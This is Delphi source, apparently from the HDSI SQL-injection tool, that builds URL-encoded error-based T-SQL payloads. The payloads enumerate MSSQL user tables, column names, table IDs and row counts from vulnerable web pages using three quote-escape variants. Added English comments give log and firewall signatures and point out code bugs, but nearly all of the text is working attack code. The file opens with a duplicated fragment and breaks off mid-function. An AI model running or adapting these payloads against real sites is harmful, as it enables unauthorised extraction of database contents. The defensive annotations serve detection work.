
📄 cjdatabase_unit.~pas

📁 sql inject HDSI3--delphi.rar
      //*********************
        str_ext:='%20And%20(Select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(8000))' +
          '%20from(Select%20Top%20' + inttostr(iTop) + '%20id,name%20from%20[' + FDbName + ']..[sysobjects]' +
            '%20Where%20xtype=char(85)%20order%20by%20name%20asc,id%20desc)%20T%20order%20by%20name%20desc,id%20asc)>0';
      case Inject_methord of
      0:    begin
              Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
              exit;
            end;
      1:    begin
              URL:=str_url+str_ext;
            end;
      2:    begin
              URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
            end;
      3:    begin
              URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
            end;
      end;
      //*********************
      result:=define_unit.GetURLMsg(URL);

  finally
  end;
end;
//**********************************************************

//**********************************************************
// Function: fetch one user-table name from the database named by str_db.
//   str_url - base request URL; the generated suffix is appended to it
//   str_db  - database name spliced into the [db]..[sysobjects] reference
//   iTop    - row position, used as the inner "Top N" of the nested select
// Returns whatever define_unit.GetURLMsg yields for the built URL. GetURLMsg is
// defined outside this excerpt; presumably it sends the request and extracts
// the ^-delimited value from the response - confirm there.
// Defender view: the request carries URL-encoded T-SQL in the query string
// that names [sysobjects], xtype=char(85) (ASCII 'U') and char(94) (ASCII '^').
// Those literals are stable signatures for web-log and WAF rules. Comparing a
// varchar cast with ">0" appears to depend on the server echoing the
// conversion error text, so parameterized queries plus generic error pages
// close the channel this code reads from.
function GetTableNameByDb(str_url:string;str_db:string;iTop:integer):string;
var
  str_ext:string;
  URL:string;
begin

  // Side effect: overwrites the unit-level FDbName from the main form's edit
  // box, although the query below uses the str_db parameter instead.
  FDbName:=Form_main.suiEdit_dbname.Text;
  try
      //*********************
        // Suffix, URL-decoded (%20 = space, %2B = '+'): the inner select takes the
        // first iTop (id,name) rows of user tables ordered by name ascending, the
        // outer select keeps the top 1 in descending order, i.e. the iTop-th name,
        // wrapped in '^' markers.
        str_ext:='%20And%20(Select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(8000))' +
          '%20from(Select%20Top%20' + inttostr(iTop) + '%20id,name%20from%20[' + str_db + ']..[sysobjects]' +
            '%20Where%20xtype=char(85)%20order%20by%20name%20asc,id%20desc)%20T%20order%20by%20name%20desc,id%20asc)>0';
      // Inject_methord is declared outside this excerpt. It selects how the suffix
      // is attached to str_url; no branch assigns URL for values other than 1..3.
      case Inject_methord of
      0:    begin
              // Message text: "this address may not be injectable, unknown method".
              // Result is not assigned on this early-exit path.
              Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
              exit;
            end;
      1:    begin
              // Suffix appended as-is.
              URL:=str_url+str_ext;
            end;
      2:    begin
              // Prefixes a single quote and appends " And ''='".
              URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
            end;
      3:    begin
              // Prefixes "%'" (%25 = '%') and appends " And '%'='".
              URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
            end;
      end;
      //*********************
      result:=define_unit.GetURLMsg(URL);

  // Empty finally: the try block adds no cleanup and exceptions propagate.
  finally
  end;
end;
//**********************************************************
// Function: fetch the record count of a table and return it as text.
//   str_url   - base request URL; the generated suffix is appended to it
//   TableName - table name spliced into the [FDbName]..[TableName] reference
// Returns the text from define_unit.GetURLMsg when StrToInt accepts it,
// otherwise the literal '未知' ("unknown"). GetURLMsg is defined outside this
// excerpt; presumably it sends the request and extracts the ^-delimited value.
// Defender view: the query string carries "Cast(Count(1) as varchar(8000))"
// between two char(94) markers and a three-part [db]..[table] name; these are
// usable log/WAF signatures. The value is only recoverable if the application
// returns database error text, so generic error pages and parameterized
// queries remove the channel.
function GetRecordCount(str_url,TableName:string):string;
var
  sCount:string;// holds the returned text that represents the record count
  URL:string;
  str_ext:string;
begin
    //*********************
    // Side effect: copies the database name from the main form into the
    // unit-level FDbName (declared outside this excerpt).
    FDbName:=Form_main.suiEdit_dbname.Text;
    //*********************
    // Suffix, URL-decoded: And (Select '^'+Cast(Count(1) as varchar(8000))+'^'
    // From [FDbName]..[TableName] Where 1=1)>0
    str_ext:='%20And%20(Select%20char(94)%2BCast(Count(1)%20as%20varchar(8000))'+
      '%2Bchar(94)%20From%20['+FDbName+']..['+ TableName + ']%20Where%201=1)>0';
    //*********************
    // Inject_methord (declared elsewhere) selects how the suffix is attached;
    // no branch assigns URL for values other than 1..3.
    case Inject_methord of
      0:    begin
              // Message text: "this address may not be injectable, unknown method".
              // Result is not assigned on this early-exit path.
              Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
              exit;
            end;
      1:    begin
              // Suffix appended as-is.
              URL:=str_url+str_ext;
            end;
      2:    begin
              // Prefixes a single quote and appends " And ''='".
              URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
            end;
      3:    begin
              // Prefixes "%'" (%25 = '%') and appends " And '%'='".
              URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
            end;
    end;
  //*********************
    try
      sCount:=define_unit.GetURLMsg(URL);
    except
      on E:Exception do
      begin
        // The exception is reported in a dialog and then swallowed; execution
        // continues with sCount unassigned by this block.
        Application.MessageBox(pchar('获取表记录数时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
      end;
    end;

    // StrToInt is called only as a validity check; its value is discarded.
    try
      strtoint(sCount);
    except
      sCount:='未知';
    end;

    result:=sCount;

end;

//**********************************************************
 //**********************************************************
// Function: fetch the record count of a table in a named database, as text.
//   str_url   - base request URL; the generated suffix is appended to it
//   str_db    - database name spliced into the [str_db]..[TableName] reference
//   TableName - table name spliced into the same reference
// Returns the text from define_unit.GetURLMsg when StrToInt accepts it,
// otherwise the literal '未知' ("unknown"). GetURLMsg is defined outside this
// excerpt; presumably it sends the request and extracts the ^-delimited value.
// Unlike GetRecordCount, this variant does not touch the unit-level FDbName.
// Defender view: same request shape as GetRecordCount - "Cast(Count(1) as
// varchar(8000))" framed by char(94) in the query string - so one log/WAF
// signature covers both. Generic error pages and parameterized queries remove
// the channel the value is read from.
function GetRecordCountByDb(str_url,str_db,TableName:string):string;
var
  sCount:string;// holds the returned text that represents the record count
  URL:string;
  str_ext:string;
begin

    // Suffix, URL-decoded: And (Select '^'+Cast(Count(1) as varchar(8000))+'^'
    // From [str_db]..[TableName] Where 1=1)>0
    str_ext:='%20And%20(Select%20char(94)%2BCast(Count(1)%20as%20varchar(8000))'+
      '%2Bchar(94)%20From%20['+str_db+']..['+ TableName + ']%20Where%201=1)>0';
    // Inject_methord (declared elsewhere) selects how the suffix is attached;
    // no branch assigns URL for values other than 1..3.
    case Inject_methord of
      0:    begin
              // Message text: "this address may not be injectable, unknown method".
              // Result is not assigned on this early-exit path.
              Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
              exit;
            end;
      1:    begin
              // Suffix appended as-is.
              URL:=str_url+str_ext;
            end;
      2:    begin
              // Prefixes a single quote and appends " And ''='".
              URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
            end;
      3:    begin
              // Prefixes "%'" (%25 = '%') and appends " And '%'='".
              URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
            end;
    end;
  //*********************
    try
      sCount:=define_unit.GetURLMsg(URL);
    except
      on E:Exception do
      begin
        // The exception is reported in a dialog and then swallowed.
        Application.MessageBox(pchar('获取表记录数时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
      end;
    end;

    // StrToInt is called only as a validity check; its value is discarded.
    try
      strtoint(sCount);
    except
      sCount:='未知';
    end;

    result:=sCount;

end;
//**********************************************************
// Function: fetch the number of user tables listed in sysobjects.
//   str_url - base request URL; must be non-empty
// Returns the count as an integer, or 0 when the fetched text is not numeric.
// The database name is read from Form_main.suiEdit_dbname and must be
// non-empty. Result is not assigned on the three early-exit paths below.
// GetURLMsg is defined outside this excerpt; presumably it sends the request
// and extracts the ^-delimited value from the response - confirm there.
// Defender view: the query string carries "count(1)" over [db]..[sysobjects]
// filtered by xtype=char(85) (ASCII 'U'), framed by char(94) markers. A web
// account that cannot read system catalogs, parameterized queries and generic
// error pages each break this request; the literals are usable log signatures.
function GetUserTableCount(str_url:string):integer;
var
  sCount:string;
  str_ext:string;
  URL:string;
begin
    //*********************
    if str_url='' then
    begin
        // Message text: "the address must not be empty".
        Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
        exit;
    end;
    //*********************
    if Form_main.suiEdit_dbname.Text='' then
      begin
        // Message text: "current database name is empty, cannot enumerate tables".
        Application.MessageBox(pchar('当前数据库名为空,不能猜解表名'),pchar('警告'),mb_ok+mb_iconinformation);
        exit;
      end;
    // Side effect: stores the form's database name in the unit-level FDbName.
    FDbName:=Form_main.suiEdit_dbname.Text;
    //*********************
    // Suffix, URL-decoded: And (select '^'+cast(count(1) as varchar(80))+'^'
    // from [FDbName]..[sysobjects] where xtype='U')=0
    // Note the comparison here is "=0", where the sibling functions use ">0".
    str_ext:='%20And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20from%20['
    +FDbName+']..[sysobjects]%20where%20xtype=char(85))=0';
    // Inject_methord (declared elsewhere) selects how the suffix is attached;
    // no branch assigns URL for values other than 1..3.
    case Inject_methord of
      0:    begin
              // Message text: "this address may not be injectable, unknown method".
              Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
              exit;
            end;
      1:    begin
              // Suffix appended as-is.
              URL:=str_url+str_ext;
            end;
      2:    begin
              // Prefixes a single quote and appends " And ''='".
              URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
            end;
      3:    begin
              // Prefixes "%'" (%25 = '%') and appends " And '%'='".
              URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
            end;
    end;
  //*********************
    try
      sCount:=define_unit.GetURLMsg(URL);
    except
      on E:Exception do
      begin
          // The exception is reported in a dialog and then swallowed.
          Application.MessageBox(pchar('获取系统表中的用户表个数时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
      end;
    end;
    // Convert the fetched user-table count to an integer; any conversion
    // failure yields 0.
    try
      result:=strtoint(sCount);
    except
      on E:Exception do
      begin
      result:=0;
      end;
    end;
   //*********************

end;
//**********************************************************
// Function: fetch the sysobjects id of a table, given its name.
//   str_url   - base request URL; the generated suffix is appended to it
//   TableName - table name placed between single quotes in the where clause
// Returns the text from define_unit.GetURLMsg unchanged (no numeric check).
// GetURLMsg is defined outside this excerpt; presumably it sends the request
// and extracts the ^-delimited value from the response - confirm there.
// Defender view: the query string carries "cast(id as varchar(80))" over
// [db]..[sysobjects] with a quoted name filter, framed by char(94) markers.
// Catalog reads by the web account, string-built SQL and verbose error pages
// are the three conditions this request needs; removing any one defeats it.
function GetTableNameID(str_url:string;TableName:string):string;
var
  TableID:string;
  str_ext:string;
  URL:string;
begin

  // Side effect: copies the database name from the main form into the
  // unit-level FDbName (declared outside this excerpt).
  FDbName:=Form_main.suiEdit_dbname.Text;
  //*********************
  // Suffix, URL-decoded: And (select '^'+cast(id as varchar(80))+'^'
  // from [FDbName]..[sysobjects] where name = 'TableName')=0
  str_ext:='%20And%20(select%20char(94)%2Bcast(id%20as%20varchar(80))%2Bchar(94)%20from%20['
  +FDbName+']..[sysobjects]%20where%20name%20=%20'''+TableName+''')=0';
  // Inject_methord (declared elsewhere) selects how the suffix is attached;
  // no branch assigns URL for values other than 1..3.
  case Inject_methord of
      0:    begin
              // Message text: "this address may not be injectable, unknown method".
              // Result is not assigned on this early-exit path.
              Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
              exit;
            end;
      1:    begin
              // Suffix appended as-is.
              URL:=str_url+str_ext;
            end;
      2:    begin
              // Prefixes a single quote and appends " And ''='".
              URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
            end;
      3:    begin
              // Prefixes "%'" (%25 = '%') and appends " And '%'='".
              URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
            end;
  end;
  //*********************
    try
    TableID:=define_unit.GetURLMsg(URL);
    except
      on E:Exception do
      begin
        // The exception is reported in a dialog and then swallowed.
        Application.MessageBox(pchar('获取用户表ID时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
      end;
    end;
  result:=TableID;
  //*********************
end;

//**********************************************************
// Function: fetch one column name of a table, given the table's name.
// (The original header read "get table name by table id", which does not
// match the code: the query joins sysobjects to syscolumns and selects B.name.)
//   str_url   - base request URL; must be non-empty
//   iTop      - row position, used as the inner "Top N" of the nested select
//   TableName - table name placed between single quotes in the where clause
// Returns whatever define_unit.GetURLMsg yields for the built URL. GetURLMsg is
// defined outside this excerpt; presumably it sends the request and extracts
// the ^-delimited value. Result is not assigned on the early-exit paths or
// when the except handler runs.
// Defender view: the query string names both [sysobjects] and [syscolumns]
// with a join on A.id=B.id, framed by char(94) markers; that pair of catalog
// names in a URL is a strong log/WAF signature. Parameterized queries, a
// database account without catalog read access and generic error pages each
// break this request.
function GetColumName(str_url:string;iTop:integer;TableName:string):string;
var
  // ColumName, ColumNames, i and ColumnsCount are declared but never used in
  // this function.
  ColumName:string;
  ColumNames:TStringList;
  i:integer;
  ColumnsCount:integer;
  str_ext:string;
  URL:string;
begin
    //*********************
   if str_url='' then
    begin
        // Message text: "the address must not be empty".
        Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
        exit;
    end;
    //*********************
    if Form_main.suiEdit_dbname.Text='' then
      begin
        // Message text: "current database name is empty, cannot enumerate tables".
        Application.MessageBox(pchar('当前数据库名为空,不能猜解表名'),pchar('警告'),mb_ok+mb_iconinformation);
        exit;
      end;
    //*********************
    // Side effect: stores the form's database name in the unit-level FDbName.
    FDbName:=Form_main.suiEdit_dbname.Text;
    try
        //*********************
        // Suffix, URL-decoded: the inner select takes the first iTop column
        // names of TableName ordered ascending, the outer select keeps the top 1
        // in descending order, i.e. the iTop-th column name, wrapped in '^'.
        str_ext:='%20And%20(select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(80))'+
        '%20from(Select%20Top%20'+inttostr(iTop)+'%20B.name%20from%20['+FDbName+']..[sysobjects]%20A%20,['+FDbName+']..[syscolumns]%20B%20where%20A.id=B.id%20and%20A.name='''+TableName+'''%20order%20by%20B.name%20asc)%20T%20order%20by%20name%20desc)>0';
        //*********************
        // Inject_methord (declared elsewhere) selects how the suffix is
        // attached; no branch assigns URL for values other than 1..3.
        case Inject_methord of
          0:    begin
                  // Message text: "this address may not be injectable, unknown method".
                  Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
                  exit;
                end;
          1:    begin
                  // Suffix appended as-is.
                  URL:=str_url+str_ext;
                end;
          2:    begin
                  // Prefixes a single quote and appends " And ''='".
                  URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
                end;
          3:    begin
                  // Prefixes "%'" (%25 = '%') and appends " And '%'='".
                  URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
                end;
        end;
        //*********************
        result:=define_unit.GetURLMsg(URL);

    except
          // Bare handler: every exception type is swallowed and replaced by a
          // dialog; the exception message itself is not shown.
          Application.MessageBox(pchar('获取用户表列名时出现异常,操作终止!'),'提示',mb_ok+mb_iconinformation);
    end;
    //*********************
end;

//**********************************************************

//**********************************************************
// Function: fetch one column name of a table in a named database.
// (The original header read "get table name by table id", which does not
// match the code: the query joins sysobjects to syscolumns and selects B.name.)
//   str_url   - base request URL; not checked for emptiness here
//   iTop      - row position, used as the inner "Top N" of the nested select
//   DbName    - database name used for the [sysobjects] reference
//   TableName - table name placed between single quotes in the where clause
// Returns whatever define_unit.GetURLMsg yields for the built URL. GetURLMsg is
// defined outside this excerpt; presumably it sends the request and extracts
// the ^-delimited value. Result is not assigned on the early-exit path or when
// the except handler runs.
// Defender view: same request shape as GetColumName - [sysobjects] joined to
// [syscolumns] on A.id=B.id, framed by char(94) markers - so one log/WAF
// signature covers both. Parameterized queries, a database account without
// catalog read access and generic error pages each break this request.
function GetColumNameByDb(str_url:string;iTop:integer;DbName:string;TableName:string):string;
var
  // ColumName, ColumNames, i and ColumnsCount are declared but never used in
  // this function.
  ColumName:string;
  ColumNames:TStringList;
  i:integer;
  ColumnsCount:integer;
  str_ext:string;
  URL:string;
begin

    try
        //*********************
        // The [sysobjects] reference uses the DbName parameter, while the
        // [syscolumns] reference reads the unit-level FDbName, which this
        // function never sets; the two names can therefore differ in the
        // generated request.
        str_ext:='%20And%20(select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(80))'+
        '%20from(Select%20Top%20'+inttostr(iTop)+'%20B.name%20from%20['+DbName+']..[sysobjects]%20A%20,['+FDbName+']..[syscolumns]%20B%20where%20A.id=B.id%20and%20A.name='''+TableName+'''%20order%20by%20B.name%20asc)%20T%20order%20by%20name%20desc)>0';
        //*********************
        // Inject_methord (declared elsewhere) selects how the suffix is
        // attached; no branch assigns URL for values other than 1..3.
        case Inject_methord of
          0:    begin
                  // Message text: "this address may not be injectable, unknown method".
                  Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
                  exit;
                end;
          1:    begin
                  // Suffix appended as-is.
                  URL:=str_url+str_ext;
                end;
          2:    begin
                  // Prefixes a single quote and appends " And ''='".
                  URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
                end;
          3:    begin
                  // Prefixes "%'" (%25 = '%') and appends " And '%'='".
                  URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
                end;
        end;
        //*********************
        result:=define_unit.GetURLMsg(URL);

    except
          // Bare handler: every exception type is swallowed and replaced by a
          // dialog; the exception message itself is not shown.
          Application.MessageBox(pchar('获取用户表列名时出现异常,操作终止!'),'提示',mb_ok+mb_iconinformation);
    end;
    //*********************
end;

//**********************************************************
//函数:获取一个表的列数
function GetColumnCount(str_url:string;TableName:string):integer;
var
    sCount:string;
    str_ext:string;
    URL:string;
begin

    //*********************
    if str_url='' then
    begin
        Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
        exit;
    end;
    //*********************
    if Form_main.suiEdit_dbname.Text='' then
      begin
        Application.MessageBox(pchar('当前数据库名为空,不能猜解表名'),pchar('警告'),mb_ok+mb_iconinformation);
        exit;
      end;
    //*********************
    FDbName:=Form_main.suiEdit_dbname.Text;
    //*********************
    str_ext:='%20And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20from%20['
    +FDbName+']..[syscolumns]%20A,['+FDbName+']..[sysobjects]%20B%20where%20A.id=B.id%20and%20B.name='''+TableName+''')>0';
    //*********************
    case Inject_methord of
      0:    begin
              Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
              exit;
            end;
      1:    begin
              URL:=str_url+str_ext;
            end;
      2:    begin
              URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
            end;
      3:    begin
              URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
            end;
    end;
    //*********************
    try
    sCount:=define_unit.GetURLMsg(URL);
    except
      on E:Exception do
